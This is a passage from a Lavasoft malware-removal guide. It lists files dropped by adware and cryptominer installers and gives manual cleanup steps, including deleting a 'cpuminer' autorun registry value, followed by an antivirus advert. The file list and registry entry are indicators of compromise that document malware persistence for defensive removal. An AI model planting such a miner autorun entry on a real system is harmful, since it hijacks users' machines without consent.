    %Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
    %Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)
    C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
    C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
    C:\Windows\Temp\G_RuleList.txt (16 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
    %Program Files% (x86)\is383871.log (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now